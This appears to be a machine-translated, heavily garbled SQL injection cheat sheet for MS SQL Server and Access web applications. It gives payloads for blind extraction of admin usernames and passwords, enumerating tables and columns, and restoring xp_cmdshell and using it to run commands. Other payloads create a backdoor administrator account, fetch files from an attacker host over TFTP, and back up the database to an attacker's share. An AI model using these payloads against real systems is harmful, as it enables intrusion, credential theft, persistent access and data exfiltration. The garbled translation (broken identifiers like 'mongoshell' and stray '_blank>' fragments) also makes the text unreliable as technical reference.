Amxking
Determine whether there are any injection points
; And 1 = 1 and 1 = 2
2. Generally, the name of a table is admin adminuser user pass.
Password ..
And 0 (select count (*) from *)
And 0 (select
Count (*) from admin) --- determine whether the admin table exists
3. Assume that the number of accounts is 00 )--
And 1 = (select
Count (*) from admin where len (User field name)> 0)
And 1 = (select count (*) from
Admin where len (_ blank> password field name password)> 0)
5. Guess the length of each field
The length of the guess is to change> 0 until the correct page is returned.
And 1 = (select count (*) from admin where
Len (*)> 0)
And 1 = (select count (*) from admin where len (name)> 6) Error
And 1 = (select count (*) from admin where len (name)> 5) the correct length is 6
And
1 = (select count (*) from admin where len (name) = 6) Correct
And 1 = (select
Count (*) from admin where len (password)> 11) Correct
And 1 = (select count (*)
From admin where len (password)> 12) the error length is 12
And 1 = (select count (*) from
Admin where len (password) = 12) Correct
6. escape characters
And 1 = (select count (*) from
Admin where left (name, 1) = a) --- guesses the first place of the user account
And 1 = (select count (*) from admin
Where left (name, 2) = AB) --- second place of the user account
In this way, you can add a character to guess the number of digits you have just guessed. Even if the account has come out
And 1 = (select top 1 count (*) from Admin where Asc (mid (pass, 5, 1) = 51 )--
This query statement can be used to guess the chinese user and the _ blank> password. You only need to replace the following number with the Chinese ASSIC code, and then convert the result to a character.
Group by users. id having 1 = 1 --
Group by users. id, users. username,
Users. password, users. privs having 1 = 1 --
; Insert into users values (666,
Attacker, foobar, 0 xffff )--
Union select top 1 COLUMN_blank> _ NAME
FROM INFORMATION_blank> _ SCHEMA. columns where TABLE_blank>
_ NAME = logintable-
Union select top 1 COLUMN_blank> _ NAME FROM
INFORMATION_blank> _ SCHEMA. columns where TABLE_blank> _ NAME = logintable WHERE
COLUMN_blank> _ name not in (login_blank> _ id )-
Union select top 1
COLUMN_blank> _ name from INFORMATION_blank> _ SCHEMA. COLUMNS WHERE
TABLE_blank> _ NAME = logintable WHERE COLUMN_blank> _ NAME NOT IN
(Login_blank> _ id, login_blank> _ name )-
Union select top 1
Login_blank> _ name FROM logintable-
Union select top 1 password FROM
Logintable where login_blank> _ name = Rahul --
Check _ blank> server patch = SP4 patch hit Error
And 1 = (select @ VERSION )--
Check the permissions of the _ blank> database connection account. The returned result is normal, proving that the permissions are _ blank> sysadmin permissions of the server role.
And
1 = (SELECT IS_blank> _ SRVROLEMEMBER (sysadmin ))--
Determine the connection _ blank> database account. (Using the SA account for connection returns normal = proves that the connection account is SA)
And sa = (SELECT
System_blank> _ user )--
And user_blank> _ name () = dbo --
And
0 (select user_blank> _ name ()--
Check whether xp_blank> _ empty shell is deleted.
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE xtype = x and name =
Xp_blank> _ mongoshell )--
Xp_blank> _ restore shell is deleted and restored. It supports absolute path recovery.
; EXEC
Master. dbo. sp_blank> _ addextendedproc xp_blank> _ mongoshell, xplog70.dll --
; EXEC master. dbo. sp_blank> _ addextendedproc xp_blank> _ your shell, c:
Inetpubwwwrootxplog70.dll --
PING your own lab in reverse order
; Use master; declare @ s
Int; exec sp_blank> _ oacreate "wscript. shell", @ s out; exec sp_blank> _ oamethod
@ S, "run", NULL, "cmd.exe/c ping 192.168.0.1 ";--
Add account
; DECLARE @ shell
Int exec SP_blank> _ OACREATE wscript. shell, @ shell output exec SP_blank>
_ OAMETHOD @ shell, run, null, C: winntsystem3220..exe/c net user amxking $
1866574/add --
Create a virtual directory edisk:
; Declare @ o int exec
Sp_blank> _ oacreate wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run,
NULL, cscript.exe c: inetpubwwwrootmkwebdir. vbs-w "Default Web site"-v "e", "e :"--
Access attributes: (write a webshell together)
Declare @ o int exec sp_blank> _ oacreate
Wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run, NULL, cscript.exe
C: inetpubwwwrootchaccess. vbs-a w3svc/1/ROOT/e + browse
Database explosion
Special _ blank> tip: % 5c = or submit/and modify % 5c
And 0 (select top 1 paths from
Newtable )--
Obtain the Database Name (from 1 to 5 is the System id, more than 6 can be determined)
And 1 = (select name from
Master. dbo. sysdatabases where dbid = 7 )--
And 0 (select count (*) from
Master. dbo. sysdatabases where name> 1 and dbid = 6)
Submit dbid =, 9 ....
Get more _ blank> database names
And 0 (select top 1 name from
Bbs. dbo. sysobjects where xtype = U) violent to a table is assumed to be admin
And 0 (select top
1 name from bbs. dbo. sysobjects where xtype = U and name not in (Admin) to get other tables.
And 0 (select count (*) from bbs. dbo. sysobjects where xtype = U and
Name = admin
And uid> (str (id) the value of the brute-force UID is assumed to be 5711277 uid = id
And
0 (select top 1 name from bbs. dbo. syscolumns where id = 5711277)
Obtain an admin field, which is assumed to be user_blank> _ id
And 0 (select top 1 name from
Bbs. dbo. syscolumns where id = 5711277 and name not in
(Id,...) to expose other fields
And 0_id from BBS. dbo. admin where username> 1)
The user name can be obtained.
In turn, you can get the _ blank> password ..... Assume that user_blank> _ id username, password, and other fields exist.
And 0 (select count (*) from master. dbo. sysdatabases where
Name> 1 and dbid = 6)
And 0 (select top 1 name from
Bbs. dbo. sysobjects where xtype = U ).
And 0 (select top 1 name from
Bbs. dbo. sysobjects where xtype = U and name not in (Address ))
And
0 (select count (*) from bbs. dbo. sysobjects where xtype = U and name = admin
And uid> (str (id) determine the id value
And 0 (select top 1 name from
BBS. dbo. syscolumns where id = 773577794) All fields
? Id =-1 union select
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin
? Id =-1 union select
1, 2, 3, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin (union, access is also useful)
Obtain the WEB path
; Create table [dbo]. [swap] ([swappass] [char] (255 ));--
And (select top 1
Swappass from swap) = 1 --
; Create table newtable (id int IDENTITY (1, 1), paths
Varchar (500) Declare @ test varchar (20) exec master .. xp_blank> _ regread
@ Rootkey = HKEY_blank> _ LOCAL_blank> _ MACHINE, @ key = SYSTEMCurrentControlSet
ServicesW3SVCParametersVirtual Roots, @ value_blank> _ name =/, values = @ test
OUTPUT insert into paths (path) values (@ test )--
; Use ku1 ;--
; Create
Table cmd (str image); -- create an image-type table cmd
The test process of xp_blank> _ cmdshell exists:
; Exec master .. xp_blank> _ your shell dir
; Exec
Master. dbo. sp_blank> _ addlogin amxking $; -- add an SQL account
; Exec
Master. dbo. sp_blank> _ password null, amxking $, 18779569 ;--
; Exec
Master. dbo. sp_blank> _ addsrvrolemember amxking $ sysadmin ;--
; Exec
Master. dbo. xp_blank> _ your shell net user amxking $18779569/workstations :*
/Times: all/passwordchg: yes/passwordreq: yes/active: yes/add ;--
; Exec
Master. dbo. xp_blank> _ your shell net localgroup administrators amxking $
/Add ;--
Exec master.. xp_blank> _ servicecontrol start, schedule
Start _ blank> Service
Exec master .. xp_blank> _ servicecontrol start, server
;
DECLARE @ shell int exec SP_blank> _ OACREATE wscript. shell, @ shell OUTPUT EXEC
SP_blank> _ OAMETHOD @ shell, run, null, C: winntsystem320000.exe/c net user
Amxking $1866574/add
; DECLARE @ shell int exec SP_blank> _ OACREATE
Wscript. shell, @ shell output exec SP_blank> _ OAMETHOD @ shell, run, null,
C: winntsystem322.16.exe/c net localgroup administrators amxking $/add
;
Exec master.. xp_blank> _ using shell tftp-I youip get file.exe -- use TFTP to upload files
; Declare @ a sysname set @ a = xp_blank> _ + export shell exec @ a dir c:
; Declare @ a sysname set @ a = xp + _ blank> _ cm '+ 'dshell exec @ a dir c:
; Declare @ a; set @ a = db_blank> _ name (); backup database @ a
Disk = your IP address your shared directory bak. dat
If it is restricted, you can.
Select * from openrowset
(_ Blank> sqloledb, server; sa;, select OK! Exec master. dbo. sp_blank> _ addlogin
Hax)